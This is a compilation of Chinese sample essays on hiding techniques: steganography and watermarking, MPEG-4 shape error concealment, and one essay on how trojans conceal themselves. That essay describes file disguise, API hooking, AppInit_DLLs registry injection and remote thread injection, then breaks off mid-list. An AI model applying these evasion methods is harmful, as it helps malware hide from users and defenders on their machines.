[16] T. Zhang, D.J. Mu, S. Ren, et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology (IC-BNMT2010),2010.

[17] T. Zhang, D.J. Mu, S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences,2013, 7(5): 1803-1807.

[18] H.B. Kekre, P. Halarnkar, K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science,2011, 145(1): 190-194.

[19] 奚玲,平西建,张韬.整数小波域湿纸码自适应信息隐藏算法[J].计算机辅助设计与图形学学报,2011,2(7):1217-1223.

[20] H. Zhao, H.X. Wang, M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing, 2011,91(11): 2595-2605.

[21] A. Lamgunde, A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science, 2011,125(2): 364-371.

[22] Y.J. Qiu, H. T. Lu, N. Deng, et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing, Information and Control(ICCIC 2011),2011.

[23] L.H. Tian, N.N. Zheng, J.R. Xue, et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing:Image Communication,2011,31(2): 9-64.

[24] 任帅,张|,慕德俊,等.基于GHM多小波与自适应颜色迁移的信息隐藏算法研究[J].西北工业大学学报,2010,28(2):64-269.

[25] 潘志庚, 孙树森, 李黎.三维模型数字水印综述[J].计算机辅助设计与图形学学报,2006,18(8):1103-1110.

[26] S.H. Lee, K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design,2011,43(8): 1056-1073.

[27] M. Luo, A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing, 2011,20(10): 2813-2826.

[28] L. Du, X.C. Cao, M.H. Zhang, et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In: Proceedings of the 14th International Conference on Information Hiding,2013.

[29] Z.Q. Yao, R.J. Pan, F.H. Li, et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics, 2010,19(4): 651-655.

[30] S. Cai, X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia, 2011,6(1): 83-90.

[31] S. Cai, X.K. Shen. OTP-W:Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science,2010.

[32] 廖学良,王屏.一种新的三维模型水印嵌入空域算法[J]. 计算机学报,2008, 31(10): 1848-1856.

[33] K. Wang, G. Lavouéa, F. Denisb, A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics,2011, 35(1): 1-19.

[34] I.L. Chung, C.M. Chou, D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing, Information and Control,2011, 7(6): 3419-3435.

[35] 胡敏,刘辉.基于特征点的自适应三维网格数字水印算法[J].合肥工业大学学报(自然科学版),2010,33(1):55-59.

[36] M. Hachani, A.Z. Ouled, S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing(ICIP),2012.

[37] Y.P. Wang, S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design, 2010,27(5): 395-404.

[38]陈力为. 中文信息处理丛书序言[M].北京:清华大学出版社,2000.

[39]俞士汶,朱学锋,贾玉祥. 汉语隐喻自动处理研究之概况[C].第四届文学与信息技术国际研讨会,2008.

[40] 谭良,吴波,刘震,等.一种基于混沌和小波变换的大容量音频信息隐藏算法[J].电子学报,2010,38(8):1812-1819.

[41] 丁玮,闫伟齐,齐东旭.基于置乱与融合的数字图象隐藏技术及其应用[J].中国图象图形学报,2000,5(8):644-649.

[42] 田云凯,贾传荧,王庆武.基于Arnold变换的图像置乱及其恢复[J].大连海事大学学报:自然科学版,2006,32(4):107-109.

[43] 彭万权,张承畅,冯文江,等.多阶幻方卷积码的构造及译码[J].电子学报,2013,41(1):123-130.

[44] W. Din, W.Q. Yan, D.X. Qi. Digital image scrambling technology based on Gray code[C]. In Proceedings of International Conference on CAD/CG,1999.

[45] R. Ren, J. Xu, S.H. Zhu. Prediction of chaotic time sequence using least squares support vector domain[J].ACTA PHYSICA SINICA, 2006,55(2): 555-563.

隐藏技术范文第4篇

Internet广泛应用下确保信息安全尤为重要。信息隐藏技术因其不可见性、通用性、安全性等特点,应用前景广阔。文章主要对信息隐藏技术原理、特点及在信息安全领域中的应用进行简要阐述。

关键词:

信息安全技术;信息隐藏技术;原理;应用

0引言

在Internet广泛应用下,网络已经深入到我们工作生活中的各个领域。当前的电子商务对网络安全提出了更高要求,如信息安全不能得到保障,国家信息安全建设就潜在巨大安全隐患。信息隐藏技术是信息安全领域中的新兴学科,能利用人类感觉器官及多媒体信号的冗余性,将信息隐匿到其它宿主信号中,让信息不易被觉察,也不影响宿主信号的使用价值[1-2]。信息隐藏技术具备不可见性、通用性、安全性等特点,应用前景广阔。本文主要对信息隐藏技术原理、特点及在信息安全领域中的应用进行简要阐述。

1信息隐藏技术

1.1基本原理

信息隐藏技术是一种将待隐信息(密文、软件序列号、版权信息等)利用某嵌入算法隐藏至一个载体信息中,从而获得一个隐藏载体的过程[3]。在此过程中,信息隐藏的目的是要确保信息不被觉察破坏,而此过程中信息的交流存储并不受限制。在信息隐藏技术下配合密码加密能更确保信息安全性。

1.2信息隐藏技术特点

信息在不同媒体掩藏下具备不同的特点,但信息隐藏技术都具备如下基本特点:(1)隐藏性:信息嵌入之后,遮掩载体外部特征不会显著改变,秘密信息的质量也不会下降,不会让人们从感官上察觉到掩护对象的变化,让非法拦截者对是否有秘密信息不能判断。(2)不可测性:隐蔽载体同原始载体特性一致,非法拦截者要将秘密信息检测并提取出来非常困难[4]。(3)不可见性:经过隐藏处理,目标资料质量不会明显下降,对这些隐藏信息,人们不会看见,也不会听见。(4)鲁棒性:信息隐藏技术不会因图像文件出现了某种改动而让隐藏的信息丢失。我们所说的改动包括如下几方面:滤波、重采样等一般信号处理;分割、缩放、平移等一般几何变换;恶意攻击等。(5)自恢复性:隐蔽载体尽管在经过变换操作后会受到破坏,但是只要存在部分数据,就可在宿主信号缺失情况下恢复隐藏信息[5]。(6)安全性:信息隐藏技术中的隐藏算法抗攻击力强,可承受较强程度人为攻击,确保隐藏信息安全可靠。

1.3模型

我们将待隐藏信息称之为为秘密信息,将公开信息称之为载体信息,他可以是文本、图像、视频或者是音频信号。信息隐藏多由密钥来控制,密钥将秘密信息利用嵌入算法隐藏到公开信息中,隐藏载体利用通信信道进行传递,随后在检测器中利用密钥将秘密信息从隐蔽载体中进行检测或恢复.

2信息隐藏术与加密技术的关系

信息的密码技术及隐藏技术都是信息安全保障技术,但两者是有显著区别的。信息加密技术能把明文在加密算法下转换成密文并利用公开信道传送至接收者的手中,非授权者能意识到保密信息存在,但却不能获知信息具体内容。信息隐藏技术下攻击者则不能对保密信息进行直观判断。两种技术不是相互竞争、相互矛盾的,是相互补充的,如果在信息隐藏技术中融入加密技术,那么信息在数据传输的过程中会达到理论上的一个最高的安全级别。

3信息隐藏的常用技术

3.1替换技术

替换就是指的是用秘密信息将伪装载体内的不重要部分替换掉,并对秘密信息进行编码的一种技术,属于空间域操作,将适合的伪装载体嵌入到适当区域,确保数据失真度保持在人的视觉允许的范围之内。这种技术算法简单,但不能抵抗图像压缩、尺寸变化等攻击,鲁棒性较差。

3.2变换技术

变换技术主要包括离散小波变换(DWT)、离散余弦变换(DCT)及离散傅利叶变换(DFT)等,每个技术都具有自身特点,DWT可对图像进行多空间、多尺度、多频率分解,可将输入信号分解成系列低分辨率细节信号;DCT能让空间域内能量重新分布,图像相关性降低;DFT能将图像分割为多个感觉的频段,让秘密信息能选择更适合部分去嵌入。这种技术鲁棒性较好,可抵抗压缩、噪音等的攻击。

3.3扩频技术

扩频技术指的是将一个比特多次嵌入到伪装载体中,让隐藏的信息在过滤之后仍能保留。这种技术尽管传输率差,但是实际应用中,在随机码下能使载有信息数据的基带信号频谱扩展,让信号变成宽带低功率谱密度的信号。其中,跳频扩频、直序扩频最为典型。且这种技术检测只需盲检,即使传输中受到乘性、加性噪音攻击,隐藏信息也不会丢失。

4信息安全技术中信息隐藏技术的应用

4.1对数字知识产权进行保护对数字知识产权进行保护是将数字指纹技术及数字水印技术来解决信息隐藏技术中所遇到的问题[6]。信息隐藏技术利用“数字

水印”在数字知识信息中嵌入签字信号,对数字知识进行产权保护。通过信息隐藏技术可将音频信号、视频信号机数字图像中嵌入不可见的信号标签,可防止攻击者对其进行数据跟踪及非法拷贝。为确保数字信息安全,服务商向用户发送产品同时可在作品中以水印形式将双方信息代码隐藏其中,一旦数字产品出现非法传播,能够利用水印代码对非法散播者进行追查。信息隐藏技术对数字知识产权进行保护中数据嵌入量小,因此对签字信号鲁棒性及安全性都要求很高。数字水印技术在使用中有一定缺陷,一旦所保护媒体被篡改,水印就会被破坏,信息就变得容易识别。而对数字票据来说就不会出现这种情况,数据票据中的隐藏水印在打印之后仍是存在的,因此对于数据票据可以利用对数据进行扫描这一形式对防伪隐藏水印进行提取,以此来判断票据真实与否。

4.2对数据完整性进行鉴定

所谓的数据完整性鉴定指的是对信号完整性及真伪进行判别,指出信号同原始信号间的差别,借此确认信息在传输及存储过程中有没有被破坏、篡改。如果接收到音频、视频等多媒体形式的信号,需对信号原始式进行判断,看信号是否为某一真实信号的修改版本,并要对原始信号内容进行是否真实性的判断[7]。要完成这种鉴定需首先在数据库的管理系统中输入各种完整数据,并制定相应的约束机制,这样才能确保数据在输入及存储过程中的完整性。其次,如数据传输可视的情况下,可以采用数据校验的方式对这些数据进行检测。

4.3对数据进行保密

网络上进行秘密数据传输的过程中最重要的就是要防止一些非法用户将其截获及使用,确保数据安全也是信息安全技术的一个主要内容。随经济全球化,电子信息技术得到了飞速发展,已经涉及到国家军事、政治、金融、商业等众多领域,关系到国家安全及个人隐私。而信息隐藏技术就是要确保网上交流信息的安全性,为信息数据进行保密。例如网上银行的交易数据,电子商务的秘密合同,电子政务的敏感信息,重要文件的数字签名等等都可以利用网络隐藏技术进行保护。除此之外,信息隐藏技术还能够将不愿让人知道的信息内容采用隐藏方式来存储,让数据更为隐匿,保密性更强,信息也更为安全。

4.4对资料不可抵赖性进行确认

网上交易的过程中,参与交易的任何一方对自己的行为都不能抵赖,对于曾接收过、接收到了对方信息也不能否认,这是确保网上交易安全的一个重要环节。在交易系统中应用信息隐藏技术之后,交易体系下的任何一方在接收及发送信息时就可以将自身独特的标记隐藏到传递的信息中,这些隐藏的标记不能被清除,从而能够确保交易过程中任何一方都不能对自己行为进行抵赖[8]。

5结语

综上所述,信息隐藏技术为多媒体信号处理及多媒体通信领域内的一个新兴研究方向,信息隐藏技术能为多媒体信息安全提供新思路。当前国际上的信息隐藏技术可以做到将隐藏信息进行仪器检测,抵抗人为攻击,但是还没有发展到可以实用的阶段,今后将密码技术同信息隐藏技术有机结合,建立不可感知性的数学度量模型,有效进行信息隐藏容量上界的计算,是今后信息隐藏技术需要努力的方向。

作者:李蟾膺 单位:民航西南空管局

参考文献:

[1]古春杰.信息隐藏技术的理论及应用[J].计算机光盘软件与应用,2014(10):189-190

[2]李彩容,胡瑞敏,涂卫平.使用信息隐藏技术保障档案信息安全[J].中国电子商情•通信市场,2013(1):183-187

[3]马秀芳,时晨,赵洪钢.具有广泛军事应用前景的信息隐藏技术[J].电信快报:网络与通信,2013(12):11-13

[4]刘会平,国伟.数字加网信息隐藏技术在隐秘保密通信中的应用[J].计算机应用,2014,34(9):2645-2649

[5]谢灵智.数字水印——信息安全研究新方向[J].信息安全与通信保密,2013(2):28.

[6]刘丽,周亚建.二维条码数字水印技术研究[J].信息网络安全,2014(1):56-60

[7]刘昊辰,罗森林.Android系统木马隐藏及检测技术[J].信息网络安全,2013(1):33-37

隐藏技术范文第5篇

关键词:木马;隐藏技术;网络安全

中图分类号:TP309.5 文献标识码:A 文章编号:1007-9599 (2012) 10-0000-02

目前,木马已经成为常见的网络攻击技术之一,对网络安全造成了严重的威胁。它具有攻击范围广、隐蔽性强等特点。本文主要针对木马的隐藏技术展开研究。

一、木马定义和特征

木马是指潜伏在电脑中,受到外部用户控制以达到窃取本机信息或控制权为目的的程序。其全称为特洛伊木马,英文叫做“Trojan horse”。它是指利用一段特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:分别为客户端和服务端,即控制端和被控制端。植入被种者电脑的是“服务器”部分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。一旦运行了木马程序的“服务器”以后,被种者的电脑就会有一个或几个端口被打开,黑客就可以利用这些打开的端口进入电脑系统,用户的个人隐私就全无保障了。木马的设计者采用多种手段隐藏木马以防止木马被发现。随着病毒编写技术的发展,木马程序采用越来越狡猾的手段来隐蔽自己,使普通用户很难发觉。

二、木马的功能

木马的主要功能有:

(一)窃取数据:仅仅以窃取数据为目的,本身不破坏损伤计算机的文件和数值,也不妨碍系统的正常办公。有很多木马有键盘记录功能,会记录服务端每次敲击键盘的动作,所以一旦有木马入侵,数据将很容易被窃取。

(二)篡改文件:对系统的文件有选择地进行篡改,对服务端上的文件有筛选的施行删除,修改,运行等一些系列相关操作。

(三)使系统自毁。利用的方法有很多:比如改变报时的钟频率、使芯片热解体而毁坏、使系统风瘫等。

三、木马的隐藏技术

(一)文件隐藏

木马程序植入目标系统后,就会改变其文件表现形式加以隐蔽,从而欺骗用户。隐藏保护木马文件的方式主要有以下几种:

1.捆绑隐藏

采用此隐蔽手段的木马主要有两种方式:插入到某程序中或者与某程序捆绑到一起,一旦程序运行木马也就会被启动,例如使用压缩的木马程序伪装成jpeg等格式的图片文件,木马程序就有了随时运行的可能。或者与常用程序捆绑到一起,一旦木马被点击就会加载运行,使用户难以防范,例如提供给用户捆绑了木马程序的解压软件,一旦用户运行该软件此程序便被释放并立即运行。

2.伪装隐藏

首先利用自身多变性的外部特征伪装成单独的文件,选定好文件名,然后修改文件系统的相关程序,最后设置文件属性为隐藏或者只读。这样,木马就伪装成了正常的文件或者非可执行文件。

3.替换隐藏

木马将自身的DLL替换为目标文件的同名DLL文件,备份原先的正常系统文件。经过这样的替换后,一般情况下,正常的系统文件,只有当具有木马的控制端向被控制端发出指令后,隐藏的程序才开始运行。

(二)进程隐藏

进程是程序运行在操作系统中的表现行为。主要有以下三种方法:

1.注册为系统服务

在WIN9X系列的操作系统中,在系统进程列表中看不到任何系统服务进程,因此只需要将指定进程注册为系统服务就可以在系统进程列表中隐形此进程。

2.使用HOOK技术

我们可以利用Windows系统提供的挂钩函数,使得被挂钩的进程在自己处理接收到的消息之前,先处理我们的消息处理函数。一般地,这个消息处理函数放在DLL中,让目标进程加载,这就达到了注入代码的目的。

所谓的HOOK技术是指通过特殊的编程手段截取Windows系统调用的API函数,并将其丢掉或者替换。例如在用户查看任务管理器时截取系统遍历进程列表的函数并进行替换,隐藏木马进程。

3.基于DLL的进程隐藏技术

DLL不会在进程列表中出现,是因为它不能独立运行,必须由进程加载并调用。一个以DLL形式的程序,通过某个已经存在进程进行加载,就可实现程序的进程隐藏。主要有以下两种方式:

在注册表中插入DLL。在Windows NT/2000/XP/2003中,有一个注册表键值HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs。当某个进程加载User32.dll时,这里面所有的DLL都将User32.dll利用LoadLibrary函数加载到该进程空间中。我们可以把自己的代码放在一个DLL中,并加入该键值,这样就可以注入到所有使用User32.dll的进程中了。

远程线程注入。在Windows系统中,每个进程都有自己专门的地址空间,一个进程不能创建本来属于另一个进程的内存指针。远程线程技术就是利用特殊的内核编程手段打破这种限制,访问另一个进程的地址空间,进而达到隐藏自身的目的。所谓远程线性插入DLL技术是指通过在另一个进程中创建远程线程的方法进入其内存空间,然后加载启动DLL程序。

文献[3]提出的基于DLL加载三级跳和线程守护的隐藏技术,增强了木马的隐蔽性与抗毁性。

(三)启动隐藏

木马的最大特点就是它一定要伴随系统的启动而启动,否则就失去了意义。木马启动的方式有以下几种:

1.注册表启动项:

利用windows平台的特殊性,通过它的注册表予以加载。一般通以下键值:

隐藏技术范文第6篇

关键词:视频对象;二值形状信息;错误隐藏;空域法;时域法

中图分类号:TN919.81 文献标识码:A 文章编号:1004373X(2008)1613003

Research on Video Object Shape Error Concealment Technology

FU Xiang,GUO Baolong,YAN Yunyi

(ICIE Institute,School of Electromechanical Engineering,Xidian University,Xi′an,710071,China)

Abstract:Shape information of Video Object(VO) is most important for correctly decoding.Shape error should be concealed to decode texture data and motion data correctly.Traditional technologies of shape error concealment are summarized in this paper,comparison and discussion are described.When the shape data does not change that much in consecutive time instants,the temporal methods outperform the spatial ones.The spatial methods are the only choice when the previous frame does not contain a shape tat is related to the current shape.Ideally,the decoder should have access to both types of techniques and choose between them or combine them,according to the situation at hand.Finally,the possible research directions of shape error concealment are pointed out.

Keywords:video object;binary shape information;error concealment;spatial method;temporal method

MPEG4标准对每个Video object (VO)单独编码,每个VO由形状信息、运动信息和纹理信息3类信息来描述[1]。由于编码的VO流对信道错误极其敏感,标准规定,如果是纹理部分出错,则只有纹理信息丢失,运动和形状信息可以由周围的信息恢复;如果是形状部分出错,则整个数据包(包含形状、纹理和运动信息)均丢失[2];并且现有的纹理和运动信息错误隐藏技术都是在正确获得形状信息的基础上得到的[3,4],可见VO形状错误隐藏的重要性。

在MPEG4中,VO的形状信息由二值alpha平面表示[5],用黑表示该像素点属于VO,而白表示该点属于背景。形状错误隐藏算法可以分为基于时域[69]和基于空域[4,9,10]的算法。时域方法可以利用前一帧的形状信息来隐藏当前帧丢失的信息,空域算法只利用当前帧的信息进行错误隐藏,适用于帧间场景变化较大,如场景变换的情况;空域算法也是静止图像的错误隐藏的惟一选择;一般情况下帧间变化较小,基于时域的方法可以得到更加好的隐藏结果。

1 空域形状错误隐藏算法

1.1 传统方法

传统空域形状数据隐藏方法主要有3种[11]:最大后验估计法、基于模糊理论的方法以及Bézier曲线拟合法。文献[11]的仿真实验和性能比较表明,Bézier曲线拟合法的隐错性能较好。Chen[9]和Luis[10]分别采用二次和3次Bézier曲线拟合丢失轮廓,由于3次曲线的连续性和平滑性都好于二次曲线,因此Luis算法性能优于Chen算法,本文仅介绍和分析Luis基于3次Bézier曲线的算法。

Luis算法首先得到二值alpha平面的轮廓曲线,由于发生错误,轮廓曲线会变得不完整;然后采用Bézier曲线插值轮廓曲线的丢失部分。其关键技术如下:

(1) 轮廓断点配对。将轮廓曲线的偶数个断点两两配成一对,以便在下一步操作中将每一对断点连接起来,从而形成完整的轮廓曲线。Luis算法利用如下公式进行断点配对:F=∑i|δAi|+|δBi|, i∈P(1) 其中δA和δB如图1所示,表示2个断点A和B处轮廓曲线的切矢与AB连线间的夹角;P表示丢失区域内所有可能的断点配对的集合,选择使代价函数F为最小的配对组合,这种配对方法基于以下假设,即对象的轮廓方向变化较慢。

(2) 确定三次Bézier曲线的4个控制点。生成1段3次Bézier曲线需要4个控制点,需要连接的1对轮廓断点作为首尾控制顶点,因此需要在首尾控制点间增加两个附加控制点。Luis算法首先采用三次参数曲线拟合丢失轮廓两侧的已知轮廓,如图1所示中的SA和SB,减小SA和SB的长度,直到拟合曲线与原始曲线间的最大均方距离小于给定阈值。

图1 Luis算法示意图然后,以SA为例,利用式(2)确定SA对应的4个Bézier曲线控制点:[p1 p2 p3 p4]=

dx13cx+dx13bx+23cx+dxax+bx+cx+dx

dy13cy+dy13by+23cy+d.yay+by+cy+dy(2)其中ax,bx,cx,dx为拟合SA的3次曲线的系数;p1和p4为SA的2个端点;p4即为图1中的点A。为了使错误隐藏的轮廓曲线满足C

(3) 根据确定的控制点,用3次Bézier曲线连接丢失轮廓。

1.2 基于水印的方法

有别于传统方法,文献[4]提出一种基于水印的VO空域形状错误隐藏算法,将形状信息或形状变化作为水印信息嵌入到人们关注较少的背景对象中,该方法对于形状信息严重丢失的情况,修复效果仍然很好。

但是,根据MPEG4的码率分配原则,在网络带宽有限时,用较多的码率传输感兴趣的视频对象,用较少的码率传输人们关注较少的背景对象,甚至不传输背景对象。因此,将形状信息作为水印嵌入背景对象中的方法不实用。

2 时域的形状错误隐藏算法

2.1 基于块的形状错误隐藏方法

基于块的方法常用于纹理信息的错误隐藏,后来被扩展到形状错误隐藏中来。当1个块发生错误时,解码器试图从前一时刻复制一个块作为错误块的替代。常用的基于块的方法共有3种形式:

(1) 简单地复制前一时刻相同位置的形状信息;

(2) 利用误差块上方块的运动矢量,从前一时刻寻找错误块的替代,对错误块进行补偿;

(3) 利用错误块周围正确解码的块,估计错误块的运动矢量,根据运动矢量利用前一帧的信息对错误块进行运动补偿。

显然,第(3)种方式得到的错误隐藏效果较好,与此类似,文献[9]中提出一种称为WSM (Weightd Side Matching)的方法,方式(3)中的方法利用错误块周围的16×16完整块进行运动估计,而WSM法则利用错误块周围4个块的一半加权后进行运动估计,即上下取8×16的块而左右取16×8的块,离丢失块越近的行(或列)分配的权值越大。最后得到一个运动矢量,以此对丢失形状进行错误隐藏。

为了克服运动补偿形状差错掩盖法对局部运动的局限性,文献[7]中提出整体运动补偿与局部修正相结合的时域形状错误隐藏算法。首先对于已知轮廓上的每一点,利用块匹配的方法找出其运动矢量,然后求出alpha平面的全局运动矢量,对当前平面进行全局运动补偿。最后利用错误块周围的已知信息,利用块匹配的方法寻找错误块的局部运动矢量,对其进行局部修正。

2.2 基于轮廓的错误隐藏方法

基于块的方法对单个块丢失的情况可以取得较好的错误隐藏效果,当多个连续块丢失时,效果则不太好,而基于轮廓的方法可以克服上述问题[8]。

Salama等[6]将VO全局运动参数嵌入视频流,在解码端,如果检测到当前帧VO形状需要错误隐藏,则利用码流中嵌入的运动参数,将当前轮廓映射到参考轮廓,然后隐藏错误的轮廓信息。这种方法隐藏效果较好,但它会使码率增加5%,而且其通用性不好,必须要解码器和编码器都支持嵌入了运动参数的编码格式。文献[8]中的MC (Motion Compensated)算法同样基于轮廓,MC算法不增加码率,通用性好,适用于丢失多个块的情况,是时域形状错误隐藏效果较好的方法。

MC算法首先计算当前轮廓上每个点的运动矢量,每个轮廓点的运动矢量v始于前一帧的轮廓点,指向当前帧对应的轮廓点。设当前帧有N个轮廓点,则这些轮廓点的运动矢量组成的运动矢量场应该满足:v.*1,v.*2,…,v.*N=argminv1,v.*2,…,vN∈V1×V2×…×VN∑Nj=2

vj-vj-1.2+α∑Nj=1vj.2(3)其中vj是从参考轮廓点指向当前轮廓点j的运动矢量;Vj是点j所有可能的运动矢量组成的集合。通过计算式(3)的最小值,可以得到2个轮廓间的最优匹配矢量场,即2轮廓间最平滑的矢量场,如图2(a)所示。

将当前轮廓与参考轮廓匹配后,可找到当前轮廓丢失段在参考轮廓上的对应部分,将该对应轮廓段映射到当前轮廓丢失部分,每个点映射的运动矢量vm可通过线性插值求得:vm=M-mM-1vstart+m-1M-1vstop(4)其中vstart和vstop分别表示轮廓丢失段的起始点和终止点与参考轮廓匹配时求得的运动矢量,如图2(a)所示;M是参考轮廓上对应于丢失轮廓的总点数;m表示当前要隐藏的点;当m从1变到M,即完成隐藏过程,隐藏后的轮廓如图2(b)。最后对隐藏的轮廓进行填充,得到隐藏的二值alpha平面,即VO的形状,如图2(c)所示。

图2 MC错误隐藏算法3 空域法和时域法的隐错性能比较

假设当前VO丢失一个包含轮廓的块,如图3(a)所示,其中灰色块表示丢失块。图3(b)是不完整轮廓,需要对其进行错误隐藏。图4(a)和图4(b)分别给出了MC算法得到的运动矢量场和隐藏结果。图5是空域法的隐藏结果,由图4和图5可看出,MC算法的隐藏结果更好地保持了VO的形状。

图3 视频对象发生错误不难看出,如果相邻VO间运动较大,对于MC算法,最平滑的运动矢量场无法映射当前形状到前一帧的相应部分,导致隐藏效果不理想甚至算法失败;而空域法只利用当前帧的信息,隐藏性能稳定,不受VO间的运动影响,这种情况下,只能选择基于空域的形状错误隐藏方法。

图4 MC算法隐藏结果图5 空域法隐藏结果4 结 语

相邻VO间运动较小时,时域法比空域法能更好地保持VO的形状;空域法只利用当前帧的信息,性能稳定,不受VO间的运动影响。当帧间变化较大时,时域法参考VO失去参考价值,在这种情况下,只能选择基于空域的形状错误隐藏方法。时域法需要图像匹配和运动补偿,一般计算量较大;空域法简单易实现。

可见,时域法和空域法各有利弊,一个好的解码器应能实现2种错误隐藏,根据具体情况选择或将两者相结合。在提高空域法的隐藏精度、提高时域法对帧间运动的鲁棒性及提高时域法的运算速度等方面,有待进一步研究。

参 考 文 献

[1]ISO/IEC JTC1/SC29/ WG11 N3908.MPEG4 video verification model version 18.0[S].

[2]Li X H,Katsaggelos A K,Schuster G M.A Recursive Shape Error Concealment Algorithm[C].Proceedings of International Conference on Image Processing,Rochester:IEEE,2002:177180.

[3]Wang Y,Wenger S,Wen J,et al.Error Resilient Video Coding Techniques\.IEEE Signal Processing Magazine Special Issue on Multimedia Communications over Networks,2000,17(4):6182.

[4]付炜,丁倩,孟维娜等.基于水印技术的MPEG4形状错误隐藏[J].现代电子技术,2007,30(11):7173,76.

[5]Shirani S,Erol B,Kossentini F.A Concealment Method for Shape Information in MPEG4 Coded Video Sequences\.IEEE Transactions on Multimedia,2000,2(3):185190.

[6]Salama P,Huang C.Error Concealemt for Shape Coding[C].Proceedings of International Conference on Image Processing,Rochester:IEEE,2002:701704.

[7]Luis D S,Fernando P.Temporal Shape Error Concealment by Global Motion Compensation With Local Refinement\.IEEE Transaction on Image Processing,2006,15(6):1 3311 348.

[8]Schuster G M,Katsaggelos A K.Motion Compensated Shape Error Concealment[J].IEEE Trans.Image Processing,

2006,15(2):501510.

[9]Chen M J,Chi C C,Chi M C.Spatial and Temporal Error Concealment Algorithms of Shape Information for MPEG4 video[J].IEEE Transactions on Circuits Systems for Video Technology,2005,15(6):778783.

[10]Luis D S,Fernando P.Spatial Shape Error Concealment for Objectbased Image and Video Coding[J].IEEE Transaction on Image Processing,2004,13(4):586599.

[11]丁学文.MPEG4数字视频错误隐藏技术的研究[D].天津:天津大学,2005.

作者简介 符 祥 男,1980年生,湖北鹤峰人,博士生。主要从事视频分割、错误隐藏和图像插值的研究。

隐藏技术范文第7篇

关键词:信息隐藏;电子信息;安全;技术;原理

中图分类号:F407.63 文献标识码:A 文章编号:

信息隐藏技术是现代人们保障信息安全的研究焦点,涉及很多领域,是人体感知能力、信息技术;密码技术等学科的很好的应用,其实现的主要载体是计算机多媒体技术,本文中作简单分析。

1信息隐藏技术的原理和特征

1.1信息隐藏与信息加密

信息加密是利用密码学技术将机密文件进行加密编码,把明文变换成密文后,通过公开信道送到接收者手中(见图1)。由于经过加密处理的密文是一组乱码,当监视通信信道的攻击者发现并截获到乱码后,就可以利用已有的各种攻击方法对密文进行破译。这种方式虽然不易被解密,但通信易被第三方察觉,一定程度上向攻击者明确提示了重要信息的存在,所以容易引起攻击者的注意,进而遭受到干扰和攻击,导致密文通信失败。同时,即使攻击者无法对密文进行破译,也可在破译失败后将该信息进行破坏,使得合法的接收者也无法获取密文。

图1 信息加密过程示意图

信息隐藏也称“信息隐匿”,是信息安全研究领域中的一门新兴的交叉学科,也是当前信息安全领域国内外各机构研究的热点方向。信息隐藏与信息加密的目的相同,都是为了保护秘密信息的存储和传输,使之免遭第三方的破坏和攻击,但两者之间具有显著的区别。信息隐藏技术是将机密信息秘密隐藏于另一公开信息(载体、宿主、掩体对象)中,即将秘密信息(嵌入对象)嵌入到另一表面看起来普通的信息载体中,然后通过该公开信息(隐藏对象)的传输来传递秘密信息(见图2)。第三方很难从公开信息中判断机密信息是否存在,即无法直观地判断所监视的信息中是否含有秘密信息。这种方式使含有隐匿信息的宿主信息不会引起第三方的注意和怀疑,降低了机密信息的截获率,从根本上保证了机密信息的安全。其关键技术主要是在确保宿主文件格式、质量和大小不变的前提下,将密文保存在该宿主文件中,且能对密文实现无损还原。

图2 信息隐藏过程示意图

1.2信息隐藏技术的原理

信息隐藏系统(典型模型见图3)包括一个嵌入过程和一个提取过程。在嵌入和提取过程中通常都会使用一个秘密信息来对其进行控制,使得只有合法授权用户才能对其进行操作,这个秘密信息被称为隐藏密钥,隐藏密钥在嵌入过程中称为嵌入密钥,在提取过程中称为提取密钥。

在嵌入过程中,信息隐藏者利用嵌入密钥,将密文添加到载体中,生成隐蔽载体。隐蔽载体在传输过程中有可能被隐藏分析者截获并进行处理。在提取过程中,提取者利用提取密钥从接收到的、可能经过修改的隐蔽载体中恢复出密文。在密文提取时,根据隐藏算法的不同,有可能需要载体,也可能不需要。

图3 信息隐藏系统的典型模型

信息隐藏可在不改变原有通信设备的基础上实现,只需要在原通信系统的收发设备,增加信息隐藏/隐藏信息提取模块,便能够在完成信息隐蔽传送的同时,保持系统原有的通信功能不受其影响(见图4)。首先获取密文信息,为进一步提高安全性,可结合信息加密技术对密文信息进行预处理,得到加密信息,之后可采取交织、纠错等编码措施。接下来,获取载体信息,如音频、图像、文本等原始宿主信息;如果采用的是变换域信息隐藏算法,则需要对载体信息进行相应的域变换;同时,为使接收端能对隐藏信息进行准确的盲检测,可在载体信息中加入同步信号。之后,便可将秘密信息嵌入到载体信息中、完成变换域的反变换,得到隐蔽载体。最后,由发送端将隐含密文信息的隐蔽载体通过公共信道进行传送。

图4 信息隐藏模型示意图

接收端获得隐蔽载体后,对其进行相应的域变换、信道解码和解密后,就获取了所嵌入的密文信息。

1.3信息隐藏技术的分类及特征

信息隐藏技术一般具有如下分类方法:

(1)按载体类型分类。根据信息隐藏所采用载体的不同,信息隐藏技术可分为文本信息隐藏、音频信息隐藏、图像信息隐藏、视频信息隐藏等。音频信息和图像信息隐藏是信息隐藏的重要分支。

